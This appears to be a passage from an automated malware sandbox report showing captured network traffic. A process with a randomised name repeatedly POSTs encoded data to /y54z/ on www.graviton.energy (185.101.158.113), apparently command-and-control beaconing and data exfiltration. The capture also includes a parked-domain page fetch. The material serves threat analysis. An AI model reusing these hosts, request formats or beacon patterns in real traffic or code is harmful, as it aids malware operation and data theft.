                                                            Data Raw: 33 64 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 48 31 42 66 2f 56 6e 50 6e 38 6e 79 58 7a 50 6e 6c 35 36 69 32 4f 32 58 71 30 2b 38 5a 74 4d 55 7a 56 30 68 70 75 51 47 68 45 2f 76 54 7a 4b 41 70 61 6e 55 70 71 65 42 32 52 62 54 38 43 78 7a 42 55 68 4c 75 31 4c 52 38 75 6a 65 6b 43 64 48 58 2b 6e 5a 78 51 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                            Data Ascii: 3d8c<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_H1Bf/VnPn8nyXzPnl56i2O2Xq0+8ZtMUzV0hpuQGhE/vTzKApanUpqeB2RbT8CxzBUhLu1LR8ujekCdHX+nZxQ==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-
                                                            Jan 11, 2025 05:44:53.598210096 CET109INData Raw: 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6d 6f 68 61 77 6b 74 6f 6f 6c 64 69 65 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22
                                                            Data Ascii: to-fit=no"/> <title>mohawktooldie.online</title> <style media="screen">.asset_star0 {backgroun
                                                            Jan 11, 2025 05:44:53.598247051 CET1236INData Raw: 64 3a 20 75 72 6c 28 27 2f 2f 64 33 38 70 73 72 6e 69 31 37 62 76 78 75 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 61 73 73 65 74 73 2f 73 74 61 72 30 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72
                                                            Data Ascii: d: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_star1 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat ce
                                                            Jan 11, 2025 05:44:53.598283052 CET1236INData Raw: 6e 31 5f 32 35 30 31 30 38 2f 62 67 2d 69 6e 76 2e 6a 70 67 27 29 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a
                                                            Data Ascii: n1_250108/bg-inv.jpg'); background-repeat: no-repeat; background-position: top center; background-blend-mode: screen; color: #323634; padding: 3rem 0; min-height: 710px;}h1 { color: #9a9dad; margin-bottom: 3rem;
                                                            Jan 11, 2025 05:44:53.598316908 CET292INData Raw: 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 35 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 38 70 78 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 37 2c 20
                                                            Data Ascii: border-radius: 25px; border: 8px solid #ffffff; background-color: rgb(27, 55, 116); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: ri
                                                            Jan 11, 2025 05:44:53.599433899 CET1236INData Raw: 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73 50 53 63 6a 5a 6d 5a 6d 5a 6d 5a 6d 4a 79 41 67 65 47 31 73 62 6e 4d 36 5a 47
                                                            Data Ascii: round-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjZmZmZmZmJyAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIiB4bWxuczpjYz0iaHR0cDovL2NyZWF0aXZlY29tbW9ucy5vcmcvbnMjIiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmR
                                                            Jan 11, 2025 05:44:53.599472046 CET1236INData Raw: 6f 6e 6c 69 6e 65 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 20 32 20 2f 20 73 70 61 6e 20 32 3b 20 6a 75 73 74 69 66 79 2d 73 65 6c 66 3a 20 65 6e 64 22
                                                            Data Ascii: online</h1> </div> <div style="grid-column: 2 / span 2; justify-self: end"> <img src="/assets/themes/registrar/images/logo_netsol.png" height="50" alt="Network Solutions"> </div> <div style="grid-column: 2 / span 2; jus
                                                            Jan 11, 2025 05:44:53.599550962 CET1236INData Raw: 69 4d 57 56 6c 4e 32 4a 68 4d 6a 59 79 4f 44 63 35 4d 6d 55 79 4f 47 55 78 4f 44 4e 6c 4d 32 55 30 4d 6d 55 34 4d 32 4d 79 4f 54 41 30 4d 57 52 69 59 7a 45 25 33 44 2a 22 3e 52 65 76 69 65 77 20 6f 75 72 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63
                                                            Data Ascii: iMWVlN2JhMjYyODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*">Review our Privacy Policy</a><br><br><a href="https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf">Service Agreement</a><br><br><a href="https://www.networksolut
                                                            Jan 11, 2025 05:44:53.599693060 CET1236INData Raw: 62 6d 56 30 63 32 39 73 59 32 39 75 63 33 52 79 64 57 4e 30 61 57 39 75 4c 6e 52 77 62 48 78 38 66 48 77 78 66 48 77 77 66 44 42 38 66 48 78 38 4d 58 78 38 66 48 78 38 4d 48 77 77 66 48 78 38 66 48 78 38 66 48 78 38 66 44 42 38 4d 48 78 38 4d 48
                                                            Data Ascii: bmV0c29sY29uc3RydWN0aW9uLnRwbHx8fHwxfHwwfDB8fHx8MXx8fHx8MHwwfHx8fHx8fHx8fDB8MHx8MHx8fDB8MHxXMTA9fHwxfFcxMD18YTk1M2Y0MGUwODI0MzEwNzc3NTg1ZDQ1OTIxNTMyNmUyYzQzMTc1MHwwfGRwLXRlYW1pbnRlcm5ldDA5XzNwaHwwfDB8NTk5NTczMjYwOHx8fA=='; let domain='
                                                            Jan 11, 2025 05:44:53.599729061 CET1236INData Raw: 64 65 64 2c 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 3a 20 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 2c 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 3a 20 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 2c 74 65 72 6d
                                                            Data Ascii: ded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent
                                                            Jan 11, 2025 05:44:53.604747057 CET1236INData Raw: 64 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f
                                                            Data Ascii: d === "function") {window.location.href = '//' + location.host;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? ""


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.1050002185.101.158.113806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:58.866154909 CET810OUTPOST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 6c 39 39 63 39 47 56 44 2f 72 4f 71 73 7a 78 49 68 31 45 53 76 46 33 6b 54 78 33 4b 6e 47 49 65 51 79 35 63 66 4d 66 35 5a 56 2b 6c 52 2b 72 6c 48 43 4a 74 53 79 34 6b 72 2f 43 49 65 4f 64 48 77 43 42 30 77 47 4e 58 56 4f 64 6d 76 47 2b 41 30 7a 33 64 43 50 59 44 5a 6d 31 6c 72 44 6d 76 4e 73 47 59 6a 6b 58 79 66 6f 32 33 76 48 4b 7a 76 55 30 69 54 6e 46 39 68 70 70 68 72 42 63 63 44 79 53 53 65 35 34 70 31 4a 45 37 69 52 70 64 37 6c 34 48 2b 6f 45 72 71 72 35 50 6d 6b 35 57 68 32 41 51 2b 76 58 32 77 37 79 47 67 70 43 61
                                                            Data Ascii: rFbdy=lo7alo5mc8LPl99c9GVD/rOqszxIh1ESvF3kTx3KnGIeQy5cfMf5ZV+lR+rlHCJtSy4kr/CIeOdHwCB0wGNXVOdmvG+A0z3dCPYDZm1lrDmvNsGYjkXyfo23vHKzvU0iTnF9hpphrBccDySSe54p1JE7iRpd7l4H+oErqr5Pmk5Wh2AQ+vX2w7yGgpCa
                                                            Jan 11, 2025 05:44:59.537334919 CET1150INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:44:59 GMT
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 09 16 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                            Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_y$p0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.1050003185.101.158.113806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:01.563301086 CET834OUTPOST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 2f 64 4e 63 38 6e 56 44 35 4c 4f 70 76 7a 78 49 72 56 45 57 76 46 7a 6b 54 7a 48 61 6e 51 77 65 51 54 4a 63 65 4a 6a 35 65 56 2b 6c 61 65 71 76 49 69 4a 79 53 79 45 61 72 39 57 49 65 4f 4a 48 77 48 6c 30 78 31 56 57 55 65 64 6f 6b 6d 2b 43 70 6a 33 64 43 50 59 44 5a 6c 4a 66 72 43 4f 76 4e 64 57 59 67 46 58 74 42 34 32 6f 34 33 4b 7a 72 55 31 70 54 6e 46 44 68 6f 46 48 72 48 59 63 44 7a 69 53 65 73 4d 71 37 4a 45 35 74 78 70 4c 79 58 68 50 2b 39 73 62 7a 6f 52 69 37 33 70 59 6d 58 39 58 76 2b 32 68 6a 4d 75 49 75 76 33 77 76 45 38 32 76 35 67 51 46 46 70 50 63 6f 37 43 66 69 53 47 37 51 3d 3d
                                                            Data Ascii: rFbdy=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQweQTJceJj5eV+laeqvIiJySyEar9WIeOJHwHl0x1VWUedokm+Cpj3dCPYDZlJfrCOvNdWYgFXtB42o43KzrU1pTnFDhoFHrHYcDziSesMq7JE5txpLyXhP+9sbzoRi73pYmX9Xv+2hjMuIuv3wvE82v5gQFFpPco7CfiSG7Q==
                                                            Jan 11, 2025 05:45:02.166234970 CET1150INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:02 GMT
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 09 16 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                            Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_y$p0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.1050004185.101.158.113806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:04.126224995 CET1847OUTPOST /y54z/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.graviton.energy
                                                            Origin: http://www.graviton.energy
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.graviton.energy/y54z/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 2f 64 4e 63 38 6e 56 44 35 4c 4f 70 76 7a 78 49 72 56 45 57 76 46 7a 6b 54 7a 48 61 6e 51 34 65 51 42 42 63 59 75 33 35 66 56 2b 6c 5a 65 71 75 49 69 4a 2f 53 79 73 65 72 39 62 31 65 4d 78 48 79 68 70 30 35 67 35 57 42 4f 64 6f 72 47 2b 44 30 7a 32 64 43 50 49 48 5a 6c 5a 66 72 43 4f 76 4e 66 2b 59 30 6b 58 74 44 34 32 33 76 48 4b 6e 76 55 30 4f 54 6e 73 34 68 6f 78 78 72 33 34 63 43 54 79 53 59 65 6b 71 7a 4a 45 6e 68 52 6f 49 79 58 64 41 2b 37 49 78 7a 70 6c 4d 37 33 68 59 6c 6a 55 62 33 2b 43 57 69 4b 79 43 68 38 4b 51 6b 43 51 4f 74 4b 52 70 45 33 49 55 63 71 4f 4b 61 69 61 49 35 6d 31 6c 69 74 75 61 56 2f 50 38 4f 67 58 72 7a 56 6d 61 61 4b 68 2f 37 68 49 5a 74 34 77 50 47 52 59 43 43 56 4d 4d 58 55 66 35 75 59 50 4e 4f 70 52 53 48 4b 59 45 35 4b 2b 38 71 56 4a 4f 58 52 4d 47 6f 46 53 47 4c 32 4a 33 4e 67 46 69 39 4a 46 4c 36 6c 4a 2b 66 35 4f 57 4b 4c 33 67 39 6f 59 64 69 7a 77 38 35 72 51 66 37 71 37 59 39 43 64 56 52 42 45 31 5a 45 73 42 [TRUNCATED]
                                                            Data Ascii: rFbdy=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQ4eQBBcYu35fV+lZequIiJ/Syser9b1eMxHyhp05g5WBOdorG+D0z2dCPIHZlZfrCOvNf+Y0kXtD423vHKnvU0OTns4hoxxr34cCTySYekqzJEnhRoIyXdA+7IxzplM73hYljUb3+CWiKyCh8KQkCQOtKRpE3IUcqOKaiaI5m1lituaV/P8OgXrzVmaaKh/7hIZt4wPGRYCCVMMXUf5uYPNOpRSHKYE5K+8qVJOXRMGoFSGL2J3NgFi9JFL6lJ+f5OWKL3g9oYdizw85rQf7q7Y9CdVRBE1ZEsBPP/syzf4lG2oHwTuYGl7STm59Xm3+5fqhAqeeZm1Unf+ZKgWmonEv1v//bcyJc/a4k3FmQk6sr8J54fHdCtQeMWRFJBdleZoWdRQabxPKX56v6M5CIlntntVI0I4RmxcECNNQHh2cRcqW42x6OoUbfK9lztlxo/8keHHNs0/YoIJHGM06fR7Ev2DZW60Ajg7iYVnGjBk9pW0Yk2jAshi2qlmDYRPDGeSQe9VFxEK+LTs4PegOXDSSew6Hga+GR7GB5zS15Eye3GfOG0xRSAag+SFXHTo5bNw+6gDWrOZfEIdGryBg6V/4oV/sfd3fKpLh9IDwFbi+p4A6OLmjAqFc6DFM/26ZW+Vm8OEo2YJFsoLaMnfmZdqJxaZ+0NhIo/P4HZ+JzeRDaq8Myx3iYpKC10veSUqSOVBTYkEj96F7WVEL17vAoEO0EOdpnPb204A3HQRPUOLrnGqb0O2/yWW8Iq2/scUBTpOD9K8Xvl7Rnnz0GATHg9t7usKR6np8IdHomMssc+aS9G/hgjqH8HN08arLJU9DP5FK4VsAL7DjcCK/G3zPU7X6OFiV89uddpFwNS3zVM5g+eu8hQoeOXBOgW7PD1h+3itUHs/TSP6CQxvHn4cTgp81uJyVCD1WE5eB193jdUrKKOrdSsWFptOEI1oH0RDeS32HQ [TRUNCATED]
                                                            Jan 11, 2025 05:45:04.796638966 CET1150INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:04 GMT
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 09 16 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                            Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_y$p0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.1050005185.101.158.113806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:06.666766882 CET544OUTGET /y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.graviton.energy
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:45:07.352046013 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            Date: Sat, 11 Jan 2025 04:45:07 GMT
                                                            Data Raw: 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 64 65 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 63 73 73 2f 61 70 70 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 6a 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 